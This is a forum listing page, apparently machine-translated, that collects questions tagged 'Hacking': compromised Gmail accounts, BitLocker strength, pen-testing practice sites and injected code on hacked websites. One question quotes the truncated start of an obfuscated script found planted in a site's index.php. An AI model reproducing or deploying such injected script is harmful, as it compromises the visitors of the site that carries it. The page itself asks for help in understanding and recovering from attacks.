Questions tagged [Hacking] (438)

7
answers

How hacked my Gmeyl account ?

Tonight found that Gmeyl tells me about suspicious activity and offers me to recover the password send me a code on the phone. In General, they will get the ultimate access to the box, I found there an attempt to send spam to my contacts, which were blocked by Google. As well as session access to my box from Indonesia. Whi...
louvenia_Kuhlman25 asked October 10th 19 at 12:25
8
answers

How effective is the use BitLocker for full disk encryption? Whether you need a complex password?

System Laptop with installed Windows 7 Ultimate and accordingly, the option to enable full disk encryption. Thus, as we know, is created (if, for any reason, was not created during installation) a new section of roughly 200 Mb, where the system stores a set of system files needed to start Windows — this partition is not enc...
jessy63 asked October 10th 19 at 10:32
4
answers

Hacked website?

Today, the site discovered code implanted in index.php. The code was implanted between the ?>. Does anyone know what is this hack and what does he do? <html><body><script>var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().subs...
jessika38 asked October 10th 19 at 07:33
13
answers

Hacking sites. Arbitrary code inserted?

Good day! The other day on several sites on CodeIgniter, one for Joomla, one on Wordpress and one entirely without CMS was installed arbitrary code in the index file.*, home.*, page.*, auth.*. Ie, in each of the files was installed a script tag with an arbitrary code. Outwardly, it was displayed as an invitation to establis...
cielo.Towne asked October 10th 19 at 05:21
3
answers

What to do if hacked E-mail

My friend hacked E-mail (GMail) and blocked access to it. There is a specific suspect (contractor or customer) people. I would like to ask you Council how to regain access to the mail? Where to turn to? Do I have to go to the office of the Russian Google? What sequence of actions to restore control? And secondly, under wh...
brody11 asked October 10th 19 at 04:59
8
answers

Cross Domain XmlHttpRequest

Good afternoon, friends. All day today I am suffering with the above topic. The initial task: When executing on site.com send a POST request (even the answer is not necessarily to obtain) at xxx.site.com. In extreme cases willing to limit themselves to the Google Chrome browser. It would seem that the problem is not new, ...
juvena asked October 9th 19 at 19:56
6
answers

Electromagnetic effects on the site?

Actually a subject, the news treats of the strange form of hacker attacks faced by... ahem... the CEC. I may be off a bit or behind the technology, it's like? PS: no political discussions sake.
Easton_Kessl asked October 8th 19 at 02:27
10
answers

Tell me what to read to find out how hackers ensure the anonymity of their actions in the network

... what palyatsya as encrypted. The culture of hacking work I want to learn more. Art fiction, something like Cryptonomicon, too, is interesting.
herta_Kihn asked October 8th 19 at 01:03
3
answers

The algorithm for determining excess traffic?

Thinking about the algorithm for determining break-PBX at the customer and record the excess traffic. In fact, you need to analyze the nature of traffic from the client and to find normal values when it is not compromised, and Vice versa, to identify traffic anomalies (customer hacked). The problem is that each client can h...
nella_Yo asked October 7th 19 at 23:20
10
answers

A website where you can practice in hacking

In some news a few weeks ago mentioned a website (not Russian), which represented about 10 quests is where you can try your hand and learn some skills of pen-testing. Tell me what website I can not find myself.
hollie.Rueck asked October 7th 19 at 22:51